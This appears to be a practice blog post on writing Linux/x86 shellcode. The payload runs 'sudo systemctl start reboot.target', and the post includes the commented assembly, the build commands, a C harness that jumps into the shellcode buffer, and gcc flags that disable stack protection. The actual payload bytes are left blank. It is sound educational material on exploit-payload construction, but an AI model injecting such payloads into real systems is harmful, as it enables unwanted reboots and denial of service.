shellcode 1 : Linux/x86 – sudo systemctl start

I recently started writing 32-bit shellcode for Linux, and I will be posting the sample shellcodes I write for practice here on this blog. This is one of many I have written so far. This shellcode uses the systemd init system to reboot the machine by executing `sudo systemctl start reboot.target`. Let's jump in. To follow the code you need to know how syscalls are invoked on x86 Linux and some basic assembly; the listing is commented and otherwise self-explanatory.



global _start

section .text

_start:
; clear out registers before use
xor eax, eax
xor edx, edx

; PUSH /usr////bin/sudo (the extra slashes pad the path to a multiple of 4 bytes)
push eax                ; NUL terminator
push 0x6f647573         ; "sudo"
push 0x2f6e6962         ; "bin/"
push 0x2f2f2f2f         ; "////"
push 0x7273752f         ; "/usr"

; execve first argument (pathname)
mov ebx, esp

; PUSH /bin///systemctl
push eax                ; NUL terminator
push 0x6c74636d         ; "mctl"
push 0x65747379         ; "yste"
push 0x732f2f2f         ; "///s"
push 0x6e69622f         ; "/bin"
mov ecx, esp

; PUSH reboot.target
push eax                ; NUL terminator
push byte 0x74          ; "t" (imm8 is sign-extended to a dword, so three NUL bytes follow it)
push 0x65677261         ; "arge"
push 0x742e746f         ; "ot.t"
push 0x6f626572         ; "rebo"
mov esi, esp

; PUSH start
push eax                ; NUL terminator
push byte 0x74          ; "t"
push 0x72617473         ; "star"
mov edi, esp

; execve second argument (argv): pointers pushed in reverse order, NULL last
push eax                ; NULL terminator of the array
push esi                ; "reboot.target"
push edi                ; "start"
push ecx                ; "/bin///systemctl"
push ebx                ; "/usr////bin/sudo"
mov ecx, esp

; execve third argument (envp): empty array
push eax
mov edx, esp

; mov 11 to eax (syscall number for execve)
mov al, 11
; call the interrupt
int 0x80

Assembling: nasm -f elf32 -o systmctl_reboot.o systmctl_reboot.nasm

Linking: ld -z execstack -o systmctl_reboot systmctl_reboot.o

Finally, extract the machine code bytes from the linked binary with objdump:

objdump -d ./systmctl_reboot -M intel

Final shellcode:


These bytes can be dropped into our template C program to trigger the shellcode:


#include <stdio.h>
#include <string.h>

/* placeholder: paste the \x-escaped bytes from the objdump output here */
unsigned char code[] = \
"";

int main(void) {
    printf("Shellcode Length: %zu\n", strlen((char *)code));
    int (*ret)() = (int (*)())code;   /* treat the buffer as a function and jump into it */
    return ret();
}



Compile with stack protection disabled and an executable stack:

gcc -fno-stack-protector -z execstack -o shellcode shellcode.c


This should trigger a system restart if the running user has a NOPASSWD entry in sudoers for this command; otherwise sudo stops at a password prompt and nothing happens.